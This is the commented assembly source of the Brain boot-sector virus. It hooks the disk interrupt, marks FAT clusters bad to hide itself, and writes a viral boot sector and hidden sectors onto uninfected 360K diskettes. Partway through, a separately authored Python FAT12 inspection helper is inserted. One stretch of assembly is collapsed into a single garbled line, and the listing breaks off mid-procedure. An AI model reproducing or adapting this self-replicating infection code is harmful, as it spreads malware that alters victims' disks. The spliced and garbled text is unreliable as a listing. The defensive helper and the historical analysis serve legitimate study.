                ASSUME  CS:VIRUSEG, DS:VIRUSEG, ES:VIRUSEG, SS:VIRUSEG

BDSK_INT        EQU     6DH                     ;Brain disk interrupt

int13_Off       EQU     4CH                     ;interrupt 13H location
int13_Seg       EQU     4EH
int6d_Off       EQU     BDSK_INT*4              ;interrupt BDSK_INT location
int6d_Seg       EQU     (BDSK_INT*4)+2

INF_HEAD        EQU     6                       ;these are defined in BRAIN.ASM
INF_SECTOR      EQU     7                       ;the BRAIN virus boot sector
INF_CYL         EQU     8
CURR_HEAD       EQU     9
CURR_SECCYL     EQU     0AH

;******************************************************************************
;The code at 100H is just a jump to 7C00H. Code for the extended sectors of the
;virus must be compiled with an offset of 200H, as they will be executed
;with that offset in high memory. Likewise, the viral Boot Sector must reside
;at 7C00. The start at offset 100H with a jump just lets us assemble this file
;as a COM file.

                ORG     100H

COM_START:      jmp     BRAIN

;******************************************************************************
;The following is the virus startup code, continued from the viral boot sector.
;All it does is move the Interrupt 13H (Disk access) vector to BDSK_INT,
;and replace the Interrupt 13H vector with its own handler, INT13_HNDLR. After
;that, the virus loads the original boot sector from the hidden area where it
;stored it, places it in the usual location at 0000:7C00, and then transfers
;control to it.

                ORG     200H

START_VIRUS:    JMP     SHORT VIRUS             ;Beginning of hidden virus sectors

                DB      '(c) 1986 Jork & Amjads (pvt) Ltd ',0
RD_COUNTER      DB      4
DRIVE_NO        DB      0
INFECT_FLAG     DB      0

VIRUS:          MOV     BYTE PTR CS:RD_COUNTER,1FH
                XOR     AX,AX
                MOV     DS,AX                   ;ds=0

                MOV     AX,WORD PTR DS:int13_Off ;Move int 13H to int 6DH
                MOV     WORD PTR DS:int6d_Off,AX ;
                MOV     AX,WORD PTR DS:int13_Seg ;
                MOV     WORD PTR DS:int6d_Seg,AX ;

                MOV     AX,OFFSET INT13_HNDLR   ;redirect int 13H to virus
                MOV     WORD PTR DS:int13_Off,AX
                MOV     AX,CS
                MOV     WORD PTR DS:int13_Seg,AX
                MOV     CX,4                    ;Retry count for disk read
                XOR     AX,AX
                MOV     ES,AX                   ;es=0
VLOOP:          PUSH    CX
                MOV     DH,BYTE PTR CS:INF_HEAD ;Attempt to read original boot
                MOV     DL,0                    ;sector from this trk/hd/sec
                MOV     CX,WORD PTR CS:INF_SECTOR ;as stored in BRAIN boot sec
                MOV     AX,0201H
                MOV     BX,7C00H                ;Put it in usual boot sec loc
                INT     BDSK_INT                ;Clean disk read under BRAIN
                JNB     GO_EXEC_BOOT            ;Continue if no error
                MOV     AH,0                    ;If error, try to reset disk
                INT     BDSK_INT
                POP     CX
                LOOP    VLOOP                   ;and loop until retry ctr 0
                INT     18H                     ;if count expires, go to ROM

GO_EXEC_BOOT:   DB      0EAH,0,7CH,0,0          ;jmp far ptr 0:07C00H
                NOP                             ;end of the virus startup code

;******************************************************************************
;This is the virus' Interrupt 13H (disk) handler. It is where all of the
;interesting things happen. It filters all disk activity as long as the virus
;is active.

INT13_HNDLR     PROC    FAR
                STI                             ;turn interrupts on
                CMP     AH,2                    ;is this interrupt a disk read?
                JNE     DONT_PROCESS            ;no, just let BIOS handle it
                CMP     DL,2                    ;is it a drive above 2?
                JA      DONT_PROCESS            ;yes, let BIOS handle it
                CMP     CH,0                    ;is it cylinder 0?
                JNE     NOT_CYL_0               ;jump if not
                CMP     DH,0                    ;is it head 0?
                JE      RD_CYL0HD0              ;Cyl 0, Hd 0, go do nice things

NOT_CYL_0:      DEC     CS:RD_COUNTER           ;miscellaneous disk read, dec ctr
                JNE     DONT_PROCESS            ;and if <> 0, pass to BIOS
                JMP     SHORT RD_CYL0HD0        ;else see if it should infect

DONT_PROCESS:   JMP     NEAR PTR BIOS_DISK      ;go pass control to BIOS

;if we get here, the virus is going to do something more than let BIOS process
;the disk access.
RD_CYL0HD0:     MOV     CS:INFECT_FLAG,0        ;clear this flag
                MOV     CS:RD_COUNTER,4         ;reset read counter to 4
                PUSH    AX                      ;save registers now
                PUSH    BX
                PUSH    CX
                PUSH    DX
                MOV     BYTE PTR CS:DRIVE_NO,DL ;put drive number here
                MOV     CX,4                    ;retry counter
BOOT_READ:      PUSH    CX
                MOV     AH,0                    ;attempt to reset diskette
                INT     BDSK_INT                ;using BIOS disk interrupt
                JB      RESET_FAILED            ;go handle an error if c set
                MOV     DH,0                    ;prep to read boot sector
                MOV     CX,1                    ;into buffer at es:bx
                MOV     BX,OFFSET DISK_BUFFER
                PUSH    ES
                MOV     AX,CS
                MOV     ES,AX
                MOV     AX,201H                 ;read one sector
                INT     BDSK_INT                ;again use BIOS disk interrupt
                POP     ES                      ;restore es
                JNB     READ_OK                 ;go process successful read
RESET_FAILED:   POP     CX                      ;else retry if disk op failed
                LOOP    BOOT_READ
                JMP     SHORT DISK_FAILURE      ;retries expired, go fail
                NOP

READ_OK:        POP     CX                      ;clear retry counter off stack
                MOV     AX,WORD PTR CS:RBRAIN_ID ;look for infected disk
                CMP     AX,1234H                ;BRAIN_ID is 1234H if infected
                JNE     NOT_INFECTED            ;if not infected, go get it
                MOV     CS:INFECT_FLAG,1        ;set flag to indicate infected
                JMP     SHORT ALREADY_INFECTED  ;and go continue processing
                ;
NOT_INFECTED:   PUSH    DS                      ;come here if not infected yet
                PUSH    ES                      ;save ds & es
                MOV     AX,CS                   ;and set ds=es=cs
                MOV     DS,AX
                MOV     ES,AX
                PUSH    SI
                CALL    INFECT_DISK             ;go infect the diskette
                JB      INF_ERROR               ;jump if it couldn't do it
                MOV     CS:INFECT_FLAG,2        ;else flag newly infected disk
                CALL    NEAR PTR PUT_LABEL      ;put (c) Brain label in root dir
INF_ERROR:      POP     SI                      ;restore registers
                POP     ES
                POP     DS
                JNB     ALREADY_INFECTED        ;if successful, go finish int 13

DISK_FAILURE: MOV AH,0 ;else attempt disk reset INT BDSK_INT ;one last time

;Control comes here once the disk has been infected. Now the virus cleans up;and executes the interrupt 13H intended by the caller.ALREADY_INFECTED: POP DX ;restore these register POP CX POP BX POP AX CMP CX,1 ;an operation on boot sector? JNE BIOS_DISK ;no, let BIOS handle it CMP DH,0 ;still looking for boot sector



        JNE     BIOS_DISK
        CMP     CS:INFECT_FLAG,1        ;boot sector, is disk infected?
        JNE     INF_02                  ;maybe not, go on
        MOV     CX,CS:WORD PTR RSTART_SECCYL ;yes, read boot sector
        MOV     DX,WORD PTR CS:RSTART_HEAD-1 ;from hidden area
        MOV     DL,CS:DRIVE_NO          ;where virus is
        JMP     SHORT BIOS_DISK         ;and let BIOS do the read
INF_02: CMP     CS:INFECT_FLAG,2        ;check for newly infected disk
        JNE     BIOS_DISK               ;nope, (should never happen)
        MOV     CX,WORD PTR CS:INF_SECTOR ;yes, infected
        MOV     DH,BYTE PTR CS:INF_HEAD ;orig boot sec loc stored here
BIOS_DISK:
        INT     BDSK_INT                ;do original BIOS disk interrupt
        RETF    2                       ;interrupt return, keep flags

INT13_HNDLR ENDP

        DB      0FH DUP (0)             ;random bytes

;******************************************************************************
;This routine modifies the FAT table on a 360K disk to accommodate the virus. It
;looks for 3 contiguous open clusters in the FAT. To do this, it loads the FAT
;into RAM and searches it. If it finds 3 contiguous clusters, it marks them
;bad in RAM and then writes the FAT out to disk.

MODIFY_FAT PROC NEAR
        JMP     SHORT PAST_CPYRT        ;jump past the following data
        NOP

CLUSTER_CNT DW  3                       ;counter used in this procedure

C_NOTICE DB     ' (c) 1986 Brain & Amjads (pvt) Ltd'

PAST_CPYRT:
        CALL    READ_FAT                ;read the FAT from disk into RAM
        MOV     AX,WORD PTR DISK_BUFFER ;get diskette type
        CMP     AX,0FFFDH               ;is it a 360K DSDD diskette?
        JE      DISK_360                ;if so, continue processing
        MOV     AL,3                    ;for any other kind, return al=3
        STC                             ;and carry set
        RET

;Come here if it is a standard 360K DSDD diskette
DISK_360:
        MOV     CX,37H                  ;start looking at FAT entry 37H
        MOV     [CLUSTER_CNT],0         ;zero cluster counter
CLUST_LOOP:
        CALL    READ_FAT_ENTRY          ;get individual FAT entry
        CMP     AX,0                    ;if 0, that cluster is empty
        JNE     NOT_EMPTY               ;if not empty, reset CLUSTER_CNT
        INC     [CLUSTER_CNT]           ;else increment it
        CMP     [CLUSTER_CNT],3         ;do we have 3 consecutive
        JNE     FIND_ANOTHER            ;clusters free? jump if not
        JMP     SHORT SPACE_FOUND       ;else this is where the virus
        NOP                             ;will go, go mark off the space

NOT_EMPTY:
        MOV     [CLUSTER_CNT],0         ;last one wasn't empty

FIND_ANOTHER:
        INC     CX                      ;look at next cluster
        CMP     CX,0163H                ;make sure we're not at end
        JNE     CLUST_LOOP              ;of disk, and check next cluster
        MOV     AL,1                    ;at end of disk, set al=1
        STC                             ;set carry to indicate error
        RET                             ;and exit

;Found space on disk for virus, mark those clusters bad now
SPACE_FOUND:
        MOV     DL,3                    ;counter for clusters to mark
SF_LOOP:
        CALL    WRITE_BAD_FAT           ;mark cluster number cx bad
        DEC     CX                      ;back up one cluster
        DEC     DL                      ;decrement cluster counter
        JNE     SF_LOOP                 ;loop until counter 0
        INC     CX                      ;cx points to first bad cluster
        CALL    COMP_HD_TRK_SEC         ;turn cx into cyl/hd/sec data
        CALL    WRITE_FAT               ;write both FATs back to disk
        MOV     AL,0                    ;set al=0 to indicate success



        CLC                             ;clear carry
        RET                             ;and exit
MODIFY_FAT ENDP

;******************************************************************************
;This routine is passed a FAT entry number in cx, and it puts a bad cluster
;marker (FF7 Hex) into that entry slot in both FATs in memory, stored at
;DISK_BUFFER and DISK_BUFFER+400H.

WRITE_BAD_FAT PROC NEAR
        PUSH    CX                      ;save cx and dx
        PUSH    DX
        MOV     SI,OFFSET DISK_BUFFER   ;DISK_BUFFER where FAT is
        MOV     AL,CL                   ;See if entry # is even or odd
        SHR     AL,1
        JB      WR_ODD                  ;go handle odd FAT entry number
        CALL    GET_FAT_OFFSET          ;even, get offset of entry
        MOV     AX,WORD PTR [BX+SI]     ;read existing value
        AND     AX,0F000H               ;mask lower entry
        OR      AX,0FF7H                ;set lower entry to bad sector
        JMP     SHORT WBF_DONE          ;all done with even
        NOP

WR_ODD: CALL    GET_FAT_OFFSET          ;odd, get offset of entry
        MOV     AX,WORD PTR [BX+SI]     ;read existing value
        AND     AX,000FH                ;mask high entry
        OR      AX,0FF70H               ;set high entry to bad sector

WBF_DONE:
        MOV     [BX+SI],AX              ;write entry back to FAT in RAM
        MOV     [BX+SI+400H],AX         ;and write it to 2nd FAT also!
        POP     DX                      ;restore DX and CX
        POP     CX
        RET

WRITE_BAD_FAT ENDP

;******************************************************************************
;This procedure reads the FAT entry number requested in cx and puts the result
;in ax.

READ_FAT_ENTRY PROC NEAR
        PUSH    CX                      ;save FAT entry number
        MOV     SI,OFFSET DISK_BUFFER   ;FAT is stored here
        MOV     AL,CL                   ;See if AL is odd or even
        SHR     AL,1                    ;put parity bit in c
        JB      DO_ODD                  ;and go handle the odd case
        CALL    GET_FAT_OFFSET          ;handle even / get proper offset
        MOV     AX,WORD PTR [BX+SI]     ;read entry into ax
        AND     AX,0FFFH                ;and mask lower entry off
        JMP     SHORT RF_EXIT           ;all done
        NOP

DO_ODD: CALL    GET_FAT_OFFSET          ;odd entry #, get offset
        MOV     AX,WORD PTR [BX+SI]     ;read entry into ax
        AND     AX,0FFF0H               ;mask upper entry off
        MOV     CL,4                    ;and shift it down 4 bits
        SHR     AX,CL

RF_EXIT:
        POP     CX                      ;restore cx
        RET                             ;Return with ax=FAT entry

READ_FAT_ENTRY ENDP

;******************************************************************************
;Find the offset of the FAT entry (in bytes) in the FAT table, which is stored
;in RAM. The FAT entry number is passed to this procedure in cx, and the offset
;is returned in bx. Each FAT entry takes up 12 bits on a 360K disk, so this
;procedure essentially has to multiply the entry number by 1.5.



GET_FAT_OFFSET PROC NEAR
        PUSH    DX                      ;preserve dx here
        MOV     AX,3                    ;multiply cx by 3
        MUL     CX
        SHR     AX,1                    ;and divide by 2
        MOV     BX,AX                   ;put result in bx
        POP     DX
        RET

GET_FAT_OFFSET ENDP

;******************************************************************************
;This reads both FAT tables from a 360K disk into the buffer DISK_BUFFER.

READ_FAT PROC NEAR
        MOV     AH,2                    ;set up read function
        CALL    RD_WRT_FAT              ;go perform the operation
        RET

READ_FAT ENDP

;******************************************************************************
;This writes both FAT tables to a 360K disk from the DISK_BUFFER.

WRITE_FAT PROC NEAR
        MOV     AH,3                    ;set up write function
        CALL    RD_WRT_FAT              ;go perform the operation
        RET

WRITE_FAT ENDP

;******************************************************************************
;This procedure actually performs the read or write function to read or
;write the FAT from/to a 360 K disk. The disk command is passed to this
;procedure in ah.

RD_WRT_FAT PROC NEAR
        MOV     CX,4                    ;retry counter = 4
DSK_LP: PUSH    CX                      ;save it
        PUSH    AX                      ;preserve ax too
        MOV     AH,0                    ;reset the disk first
        INT     BDSK_INT
        POP     AX
        JB      DSK_BAD                 ;jump if reset fails
        MOV     BX,OFFSET DISK_BUFFER
        MOV     AL,4                    ;read/write 4 sectors
        MOV     DH,0                    ;at cyl 0, hd 0, sec 2
        MOV     DL,[DRIVE_NO]
        MOV     CX,2
        PUSH    AX                      ;save ax
        INT     BDSK_INT                ;go do it
        POP     AX
        JNB     RWFAT_OK                ;exit if successful
DSK_BAD:
        POP     CX                      ;else retry
        LOOP    DSK_LP                  ;if counter not zero
        POP     AX                      ;these pops look like a bug!
        POP     AX
        MOV     AL,2                    ;set carry and al=2
        STC                             ;as an indicator of failure
        RET                             ;and return

RWFAT_OK:
        POP     CX                      ;clear stack and return
        RET                             ;with c reset on success

RD_WRT_FAT ENDP



;******************************************************************************
;This routine computes cyl, hd, and sec numbers from a cluster number passed in
;cx. It is used to determine where to do writes using BIOS, based on the
;cluster numbers gathered from the FAT when marking out a bad area. The cyl,
;hd, sec info is stored in INF_CYL, INF_HEAD and INF_SECTOR.

COMP_HD_TRK_SEC PROC NEAR
        PUSH    CX                      ;cluster number in cx
        SUB     CX,2
        SHL     CX,1                    ;
        ADD     CX,0CH                  ;cx = absolute sector number now
        MOV     AX,CX
        MOV     CL,12H                  ;cl = 18, sectors per cylinder
        DIV     CL                      ;al = trk, ah= sec in cylinder
        MOV     BYTE PTR DS:INF_CYL,AL  ;cyl of 1st sector in cluster
        MOV     BYTE PTR DS:INF_HEAD,00 ;assume head is 0
        INC     AH                      ;sector number goes 1 to 18
        CMP     AH,9                    ;is it greater than 9?
        JNA     CHTS_1                  ;no, so head is 0, sec # is ok
        SUB     AH,9                    ;else subtract 9 sectors
        MOV     BYTE PTR DS:INF_HEAD,01 ;and set head = 1
CHTS_1: MOV     BYTE PTR DS:INF_SECTOR,AH ;save sector number here
        POP     CX                      ;restore cluster number
        RET                             ;and exit

COMP_HD_TRK_SEC ENDP
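As an added illustration (my own code, not part of the booklet or of the virus listing), the FAT12 arithmetic that GET_FAT_OFFSET, READ_FAT_ENTRY, WRITE_BAD_FAT and COMP_HD_TRK_SEC perform, written in Python as the kind of helper a defender uses to inspect a 360K diskette image: it reads and writes 12-bit entries with the even/odd split, mirrors an entry into the second FAT copy at +400H, maps a cluster number to cylinder/head/sector with the same 18-sectors-per-cylinder division, and lists runs of clusters marked bad (a run of exactly three on an otherwise healthy diskette is the footprint the routines above leave). The geometry constants come from the listing; the sample FAT is constructed and the function names are mine.

```python
"""FAT12 entry arithmetic for a 360K (DSDD) diskette, as a defender's
image-analysis helper.  Constructed example; not the booklet's code.

Geometry assumed (the same figures the listing uses): 512-byte sectors,
9 sectors per track, 2 heads, 2 sectors per cluster, each FAT copy 2 sectors
(400H bytes) with the second copy directly after the first, 7 root-directory
sectors, so cluster 2 begins at absolute sector 12 (0CH).
"""
SECTORS_PER_TRACK = 9
HEADS = 2
SECTORS_PER_CLUSTER = 2
FIRST_DATA_SECTOR = 12
FAT_BYTES = 0x400            # one FAT copy; the second copy follows it
BAD_CLUSTER = 0xFF7
MEDIA_360K = 0xFFFD          # first FAT word on a 360K DSDD diskette
LAST_CLUSTER = 0x163         # 708 data sectors / 2 = 354 clusters, 2..355


def fat_offset(entry: int) -> int:
    """Byte offset of a 12-bit entry: entry * 3 / 2 (what GET_FAT_OFFSET does)."""
    return (entry * 3) >> 1


def read_entry(fat: bytearray, entry: int) -> int:
    """12-bit value of an entry (READ_FAT_ENTRY's even/odd cases)."""
    off = fat_offset(entry)
    word = fat[off] | (fat[off + 1] << 8)
    if entry & 1:                        # odd: entry is the high 12 bits
        return (word & 0xFFF0) >> 4
    return word & 0x0FFF                 # even: entry is the low 12 bits


def write_entry(fat: bytearray, entry: int, value: int, copies: int = 2) -> None:
    """Store a 12-bit value, in both FAT copies (what WRITE_BAD_FAT does)."""
    off = fat_offset(entry)
    word = fat[off] | (fat[off + 1] << 8)
    if entry & 1:
        word = (word & 0x000F) | ((value & 0xFFF) << 4)
    else:
        word = (word & 0xF000) | (value & 0xFFF)
    for copy in range(copies):
        base = off + copy * FAT_BYTES
        fat[base] = word & 0xFF
        fat[base + 1] = word >> 8


def cluster_to_chs(cluster: int) -> tuple:
    """(cyl, head, sector) of a cluster's first sector (COMP_HD_TRK_SEC)."""
    lba = (cluster - 2) * SECTORS_PER_CLUSTER + FIRST_DATA_SECTOR
    cyl, rem = divmod(lba, SECTORS_PER_TRACK * HEADS)
    head, sec = divmod(rem, SECTORS_PER_TRACK)
    return cyl, head, sec + 1            # BIOS sectors are numbered from 1


def chs_to_lba(cyl: int, head: int, sec: int) -> int:
    return (cyl * HEADS + head) * SECTORS_PER_TRACK + (sec - 1)


def bad_cluster_runs(fat: bytearray, first: int = 2, last: int = LAST_CLUSTER) -> list:
    """Runs of consecutive clusters marked bad, as (start, length) pairs."""
    runs, start = [], None
    for c in range(first, last + 1):
        if read_entry(fat, c) == BAD_CLUSTER:
            if start is None:
                start = c
        elif start is not None:
            runs.append((start, c - start))
            start = None
    if start is not None:
        runs.append((start, last + 1 - start))
    return runs


def blank_360k_fat() -> bytearray:
    """Constructed: both FAT copies of an empty 360K diskette (FD FF FF ...)."""
    fat = bytearray(2 * FAT_BYTES)
    for base in (0, FAT_BYTES):
        fat[base:base + 3] = b"\xFD\xFF\xFF"
    return fat
```

The media check the listing performs (compare the first FAT word with 0FFFDH) is the same `MEDIA_360K` comparison here; on any other diskette type the cluster-to-sector arithmetic above does not apply.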

;******************************************************************************
        DB      6 DUP (0)

DISK_FCTN   DB  3
DIR_ENTRIES DW  5BH
TEMP_W1     DW  303H
TEMP_W2     DW  0EBEH
TEMP_W3     DW  1
TEMP_W4     DW  100H

        DB      0E0H,0D8H,9DH,0D7H
        DB      0E0H,09FH,8DH,98H,09FH,8EH
        DB      0E0H
        DB      ' (c) ashar $'          ;can be played with DOS fctn 9!

;******************************************************************************
;This procedure puts the '(c) Brain' label in the root directory to notify the
;user that that diskette has been infected by the brain virus.

PUT_LABEL PROC NEAR
        CALL    READ_ROOT_DIR           ;read root directory from disk
        JB      PL_ERR                  ;exit on error
        PUSH    DI                      ;preserve di
        CALL    WRITE_LABEL             ;write the label in memory
        POP     DI
        JB      PL_ERR                  ;exit on error
        CALL    WRITE_ROOT_DIR          ;and write memory image to disk
PL_ERR: RET

PUT_LABEL ENDP

        DB      0BBH,9BH,4,0B9H,0BH,0   ;random unused bytes here
        DB      8AH,7,0F6H,0D8H,88H,4
        DB      46H,43H,0E2H,0F6H,0B0H,8
        DB      88H,4,0F8H,0C3H,0C6H,6

;******************************************************************************
;This procedure modifies the image of the root directory in memory to put the
;label '(c) Brain' in one directory entry. The label will be inserted in the
;first open entry, or it will overwrite the existing label, if there is one.
;This is an incredibly tricky procedure. It makes an attempt to fool anyone who



;tries to disassemble it, and confuse the heck out of them, using already
;executed instructions for data, etc. It is fully documented in the
;accompanying text.

WRITE_LABEL PROC NEAR
        MOV     DIR_ENTRIES,6CH         ;number of dir entries available
        MOV     SI,OFFSET DISK_BUFFER+40H ;assume DOS files are there
        MOV     TEMP_W1,DX              ;save dx
        MOV     AX,DIR_ENTRIES
        SHR     AX,1
        MOV     TEMP_W3,AX              ;TEMP_W3 = 36H
        SHR     AX,1
        MOV     TEMP_W2,AX              ;TEMP_W2 = 1BH   * needlessly
        XCHG    AX,CX
        AND     CL,43H                  ;CL = 3          * confusing
        MOV     DI,TEMP_W2
        ADD     DI,01E3H                ;DI = 1FE Hex    * code

DS_LOOP:
        MOV     AL,BYTE PTR [SI]        ;check a directory entry
        CMP     AL,0                    ;is it empty?
        JE      USE_DIR_ENTRY           ;yes, use it for label
        MOV     AL,BYTE PTR [SI+0BH]    ;else check attribute
        AND     AL,8                    ;is it a label?
        CMP     AL,8
        JE      USE_DIR_ENTRY           ;if a label, go change it
        ADD     SI,20H                  ;else go to next dir entry
        DEC     DIR_ENTRIES             ;decrement counter
        JNE     DS_LOOP                 ;and loop until all checked
        STC                             ;if no room for label set carry
        RET                             ;and return

        DB      8BH                     ;more confusion

USE_DIR_ENTRY:
        MOV     BX,WORD PTR [DI]        ;BX=ds:[1FE]=
        XOR     BX,TEMP_W3              ;BX=36H
        MOV     TEMP_W3,SI              ;TEMP_W3 = ptr to dir entry
        CLI                             ;turn OFF Interrupts
        MOV     AX,SS
        MOV     TEMP_W1,AX              ;save ss here
        MOV     TEMP_W2,SP              ;and sp here
        MOV     AX,CS
        MOV     SS,AX                   ;ss=cs
        MOV     SP,TEMP_W3              ;sp = dir entry
        ADD     SP,0CH                  ;at end of name

FUN_CODE:
        MOV     CL,51H                  ;here is where the fun starts
        ADD     DX,444CH                ; none of this code
        MOV     DI,2555H                ;really does anything
        MOV     CX,0C03H                ;except act as data for
        REPZ    CMPSW                   ;what follows
        MOV     AX,0B46H
        MOV     CX,0003H
        ROL     AX,CL                   ;AX=5A30H
        MOV     TEMP_W3,AX              ;put it here

        MOV     CX,5                    ;OK, real code, loop counter = 5
        MOV     DX,0008H                ;nonsense
        SUB     TEMP_W3,5210H           ;adjust TEMP_W3 to 0820H
        PUSH    TEMP_W3                 ;use to set attribute, last byte

;LP1 and LP2 decode the above nonsense code. BX is set to the start of the
;dual purpose code (OFFSET FUN_CODE) upon entry here.
LP1:    MOV     AH,BYTE PTR [BX]        ;get a byte from the code
        INC     BX                      ;move pointer up
        MOV     DL,AH                   ;this one goes in ah
        SHL     DL,1                    ;is byte greater than 7FH?
        JB      LP1                     ;yes, go get another

LP2:    MOV     DL,BYTE PTR [BX]        ;else get another byte
        INC     BX                      ;move pointer up



        MOV     AL,DL                   ;this one goes in al
        SHL     DL,1                    ;is byte greater than 7FH?
        JB      LP2                     ;yes, go get another

        ADD     AX,1D1DH                ;word in ax, add 1D1D to it
        PUSH    AX                      ;and use this byte to make label
        INC     WORD PTR TEMP_W3        ;no apparent purpose

        JNB     LP3                     ;this always jumps

        DB      0EAH                    ;nonsense

LP3:    LOOP    LP1                     ;loop 5 times
        MOV     SP,WORD PTR TEMP_W2     ;restore sp
        MOV     AX,WORD PTR TEMP_W1     ;and ss
        MOV     SS,AX
        STI                             ;turn ON Interrupts
        ADD     DH,BYTE PTR [BP+SI]     ;more nonsense
        CLC                             ;clear c to indicate success
        RET                             ;and exit
WRITE_LABEL ENDP

;******************************************************************************
;This procedure reads the entire root directory of a 360K floppy disk into
;memory at the location DISK_BUFFER.

READ_ROOT_DIR PROC NEAR
        MOV     [DISK_FCTN],2           ;set up for a read
        JMP     SHORT ROOT_RW           ;and go do it in procedure below
        NOP
READ_ROOT_DIR ENDP

;******************************************************************************
;This procedure writes the entire root directory of a 360K floppy disk from
;memory at the location DISK_BUFFER.

WRITE_ROOT_DIR PROC NEAR
        MOV     [DISK_FCTN],3           ;set up for a write
        JMP     SHORT ROOT_RW           ;and go do it
        NOP
WRITE_ROOT_DIR ENDP

;******************************************************************************
;This procedure performs the actual mechanics of reading/writing the root
;directory on a 360K floppy disk. It is called only from READ_ROOT_DIR and
;WRITE_ROOT_DIR above.

ROOT_RW PROC NEAR
        MOV     DH,0                    ;read/write cyl 0, hd 0, sec 6
        MOV     DL,[DRIVE_NO]
        MOV     CX,0006H
        MOV     AH,[DISK_FCTN]
        MOV     AL,04                   ;read/write 4 sectors
        MOV     BX,OFFSET DISK_BUFFER   ;to/from here
        CALL    DISK_OPERATION          ;go do it
        JB      RRW_ERR                 ;exit on error
        MOV     CX,1                    ;next rd/wrt cyl 0, hd 1, sec 1
        MOV     DH,1
        MOV     AH,[DISK_FCTN]
        MOV     AL,3                    ;read/write 3 more sectors
        ADD     BX,800H                 ;move buffer ptr up
        CALL    DISK_OPERATION
RRW_ERR: RET

ROOT_RW ENDP



;******************************************************************************
;This routine just performs a disk interrupt, with the added niceties of
;doing a disk reset before performing the requested operation, and allowing
;for up to 4 retries in the event that the interrupt is not successful. AX,
;BX,CX,DX and ES are set up just as they would be in doing a direct Int 13H
;when this routine is called.

DISK_OPERATION PROC NEAR
        MOV     [TEMP_W1],AX            ;save ax,bx,cx & dx
        MOV     [TEMP_W2],BX
        MOV     [TEMP_W3],CX
        MOV     [TEMP_W4],DX
        MOV     CX,4                    ;retry counter = 4
DO_LOOP:
        PUSH    CX
        MOV     AH,0                    ;reset disk first
        INT     BDSK_INT
        JB      DSK_FAIL                ;jump if reset failed
        MOV     AX,[TEMP_W1]            ;restore ax,bx,cx & dx
        MOV     BX,[TEMP_W2]
        MOV     CX,[TEMP_W3]
        MOV     DX,[TEMP_W4]
        INT     BDSK_INT                ;and perform requested disk op
        JNB     DSK_OK                  ;jump if it was successful
DSK_FAIL:
        POP     CX                      ;else retry up to 4 times
        LOOP    DO_LOOP
        STC                             ;if retry cnt expired, set c
        RET                             ;and exit

DSK_OK: POP     CX                      ;clean stack on success
        RET                             ;and return with c clear

DISK_OPERATION ENDP

        DB      0,0,0                   ;Unnecessary bytes

;******************************************************************************
;The following routine moves the original boot sector on the disk to the first
;sector in the hidden area. Next, it moves five sectors from RAM onto the
;disk, right after the boot sector. Finally, it moves the viral boot sector
;from RAM into the boot sector position at Cylinder 0, Head 0, Track 1. It
;assumes that the location to put the virus in has already been found and
;placed in the INF_SECTOR/INF_HEAD variables. This routine returns with
;c set if it fails.

TEMP1   DW      3                       ;Temporary storage
DISK_OP DW      301H                    ;Used by DISK_READ & DISK_WRITE
                                        ;to indicate rd/wrt operation

INFECT_DISK PROC NEAR
        CALL    MODIFY_FAT              ;modify FAT table to hide virus
        JB      INF_EXIT                ;exit on error
        MOV     WORD PTR DS:CURR_SECCYL,1
        MOV     BYTE PTR DS:CURR_HEAD,0 ;read the real boot sector
        MOV     BX,OFFSET DISK_BUFFER   ;into this buffer
        CALL    DISK_READ
        MOV     BX,OFFSET DISK_BUFFER
        MOV     AX,WORD PTR DS:INF_SECTOR
        MOV     WORD PTR DS:CURR_SECCYL,AX
        MOV     AH,BYTE PTR DS:INF_HEAD
        MOV     BYTE PTR DS:CURR_HEAD,AH ;and hide it in first sector of
        CALL    DISK_WRITE              ;hidden area on disk
        CALL    NEXT_SECTOR             ;move pointers to next sector
        MOV     CX,5                    ;sectors to write counter
        MOV     BX,200H                 ;set buffer pointer=this code
INF_WRITE_LP:
        MOV     [TEMP1],CX              ;save sector count here
        CALL    DISK_WRITE              ;write a sector to disk
        CALL    NEXT_SECTOR             ;move pointers to next sector
        ADD     BX,200H                 ;increment buffer pointer
        MOV     CX,[TEMP1]              ;restore sector count
        LOOP    INF_WRITE_LP            ;loop until done



        MOV     BYTE PTR DS:CURR_HEAD,0
        MOV     WORD PTR DS:CURR_SECCYL,1
        MOV     BX,0                    ;Now put virus' boot sector
        CALL    DISK_WRITE              ;at cyl 0, hd 0, trk 1
        CLC                             ;clear c to indicate success
INF_EXIT: RET                           ;and exit

INFECT_DISK ENDP

;******************************************************************************
;This procedure reads one sector into memory at es:bx using CURR_HEAD and
;CURR_SECCYL for the cylinder/head/sector numbers. It sets c upon return if
;the read operation fails.

DISK_READ PROC NEAR
        MOV     [DISK_OP],201H          ;instruction to read 1 sector
        JMP     SHORT DO_DISK           ;go execute operation
        NOP

DISK_READ ENDP

;******************************************************************************
;This procedure writes one sector from memory at es:bx using CURR_HEAD and
;CURR_SECCYL for the cylinder/head/sector numbers. It sets c upon return if
;the write operation fails.
DISK_WRITE PROC NEAR
        MOV     [DISK_OP],301H          ;instruction to write 1 sector
        JMP     SHORT DO_DISK           ;go execute operation
        NOP

DISK_WRITE ENDP

;******************************************************************************
;This works in conjunction with DISK_READ and DISK_WRITE above. It simply
;performs the requested disk operation, and attempts to complete it up to
;four times before giving up. If successful, it returns nc, else it returns
;with c set.

DO_DISK PROC NEAR
        PUSH    BX                      ;save buffer address
        MOV     CX,4                    ;retry count
DD_LOOP:
        PUSH    CX
        MOV     DH,BYTE PTR DS:CURR_HEAD
        MOV     DL,BYTE PTR DS:DRIVE_NO ;load current disk parameters
        MOV     CX,WORD PTR DS:CURR_SECCYL
        MOV     AX,[DISK_OP]            ;and the operation to perform
        INT     BDSK_INT                ;and execute
        JNB     DD_OK                   ;jump if successful
        MOV     AH,0                    ;else attempt disk reset
        INT     BDSK_INT
        POP     CX                      ;and go through loop again
        LOOP    DD_LOOP
        POP     BX                      ;if loop expired, clean up
        POP     BX                      ;second pop here looks like bug
        STC                             ;set carry flag
        RET                             ;and get out

DD_OK:  POP     CX                      ;disk operation successful
        POP     BX                      ;so clean up
        RET                             ;and return with c clear

DO_DISK ENDP

;******************************************************************************
;This procedure increments the memory variables CURR_SECCYL and CURR_HEAD
;to point to the next sector on a 360K disk. Upon entry, they contain a valid
;cylinder, head and sector number.



NEXT_SECTOR PROC NEAR
        INC     BYTE PTR DS:CURR_SECCYL ;increment sector counter
        CMP     BYTE PTR DS:CURR_SECCYL,0AH ;is it 10 yet?
        JNE     NS_DONE                 ;no, all done
        MOV     BYTE PTR DS:CURR_SECCYL,1 ;yes, set it to 1
        INC     BYTE PTR DS:CURR_HEAD   ;and increment head counter
